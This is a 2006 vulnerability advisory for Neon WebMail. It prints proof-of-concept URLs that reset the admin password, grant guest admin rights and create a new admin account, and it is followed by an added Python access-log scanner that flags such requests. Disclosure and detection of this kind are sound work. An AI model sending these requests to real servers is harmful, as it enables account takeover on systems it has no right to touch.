Vendor: Neon WebMail
By: SecurityFocus
CVSS: 7.5 (HIGH)
Arbitrary File Upload, Arbitrary Email Manipulation, SQL Injection, Unauthorized Access, Directory Traversal, HTML Injection
CWE: 20, 89, 79, 564, 22, 80
Product Name: Neon WebMail
Affected Version From: 05.06
Affected Version To: 5.07 (build.200607050)
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Multiple Input Validation Vulnerabilities in Neon WebMail

Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. An attacker can exploit these issues to compromise the affected application. Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issues; prior versions may also be affected.

Mitigation:

Input validation should be used to ensure that untrusted data is not allowed to affect the application's logic. All input data should be validated and filtered for malicious content.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20109/info
    
Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include:
    
- an arbitrary-file-upload vulnerability
- an arbitrary-email-manipulation vulnerability
- multiple SQL-injection vulnerabilities
- an unauthorized-access vulnerability
- multiple directory-traversal vulnerabilities
- an HTML-injection vulnerability. 
    
An attacker can exploit these issues to compromise the affected application.
    
Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issues; prior versions may also be affected.

http://www.example.com/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=admin&in_admin=1&
in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=update
http://www.example.com/neonwebmail/updateuser?in_id=guest&in_pass=guest&in_name=guest&in_admin=1&
in_showmailcount=20&in_usecss=1&in_autopoptime=5&in_poppop=1&in_replysign=&in_formwidth=80&exe=update
http://www.example.com/neonwebmail/updateuser?in_id=admin&exe=read
http://www.example.com/neonwebmail/updateuser?in_id=super&in_pass=super&in_name=super&in_admin=1&
in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=insert
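
Since no patch exists, one way to watch for the request pattern shown above is to scan web server access logs for calls to the updateuser endpoint. The following is an added example, not part of the advisory or of Neon WebMail. It assumes Common/Combined Log Format with the query string logged, and the function names, the sample log lines and the flagging rules are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP and request target from a Common/Combined Log Format line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# exe values that modify or create an account, as seen in the advisory's URLs.
WRITE_ACTIONS = {"update", "insert"}

def classify(line):
    """Return (client_ip, account, reason) for a suspicious updateuser request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.rstrip("/").endswith("/updateuser"):
        return None
    # parse_qs percent-decodes names and values, so encoded parameter names still match.
    q = parse_qs(url.query, keep_blank_values=True)
    exe = q.get("exe", [""])[0].lower()
    account = q.get("in_id", [""])[0]
    if exe in WRITE_ACTIONS and q.get("in_admin", ["0"])[0] == "1":
        return (m.group("ip"), account, f"{exe} sets in_admin=1")
    if exe in WRITE_ACTIONS and "in_pass" in q:
        return (m.group("ip"), account, f"{exe} sets password via query string")
    if exe == "read" and account:
        return (m.group("ip"), account, "account record read")
    return None

def scan(lines):
    """Classify every log line and keep only the flagged requests."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2006:10:00:01 +0000] "GET /neonwebmail/updateuser?in_id=guest&in_pass=x&in_admin=1&exe=update HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Oct/2006:10:00:05 +0000] "GET /neonwebmail/updateuser?in_id=admin&exe=read HTTP/1.1" 200 734',
    '198.51.100.4 - - [01/Oct/2006:10:01:00 +0000] "GET /neonwebmail/inbox?page=2 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Oct/2006:10:02:00 +0000] "GET /neonwebmail/updateuser?in_id=bob&in_pass=n3w&in_admin=0&exe=update HTTP/1.1" 200 512',
    '192.0.2.9 - - [01/Oct/2006:10:03:00 +0000] "GET /neonwebmail/updateuser?in_id=super&in%5Fadmin=1&exe=Insert HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, account, reason in scan(SAMPLE_LOG):
        print(f"{ip}\t{account}\t{reason}")
```

Requests sent as POST do not log their parameters in this format, so a hit list from access logs is a lower bound; every flagged account should be checked against the list of accounts that are supposed to hold admin rights.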